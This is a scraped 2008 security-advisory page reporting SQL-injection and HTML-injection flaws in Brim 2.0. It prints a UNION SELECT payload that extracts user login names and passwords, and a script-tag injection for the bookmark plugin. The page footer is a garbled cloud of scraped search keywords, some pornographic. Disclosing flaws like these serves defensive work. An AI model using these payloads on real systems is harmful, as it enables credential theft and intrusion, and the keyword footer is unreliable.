about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Brim SQL Injection and HTML Injection Vulnerabilities


Title Brim SQL Injection and HTML Injection Vulnerabilities
Published 2008-09-01-12:00AM
Updated 2008-09-01-12:00AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  InjEctOr5
Vulnerable  Brim Brim 2.0
Not Vulnerable  
Code  Attackers can exploit these issues via a browser.The following examples are available:To demonstrate the SQL-injection vulnerability insert the following into any field on the search page:' union select 1,2,3,4,concat(loginname,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17 from brim_users/*To demonstrate the HTML-injection vulnerability add the following as the name for an action within the bookmark plugin:>"><script>alert("InjEctOr Team5")</script>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 23:26:44 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.pornog ply %2Fadmin%2 ////compon bebo sign Fuok scool tiffany te joomla com Dit www.kerala transport 200 /compo /modules/F php-nuke 2 mre all cartoo GET /galle %...m//plu Ramba Vidiosexx Move xxx photo buck download v Slaed CMS photo buck Sameera nu Up baord 1 Indian hot www xxx89 Www.Livese sexy photo Xvidios Karena sex x stat Serv-U ftp horse havi horse havi Www.sexy i SEX 89 COM www.89.co t830t t217t phpBB por big titts www.69.com www.sex ar t217t www.69.com comedev on www.9i51.c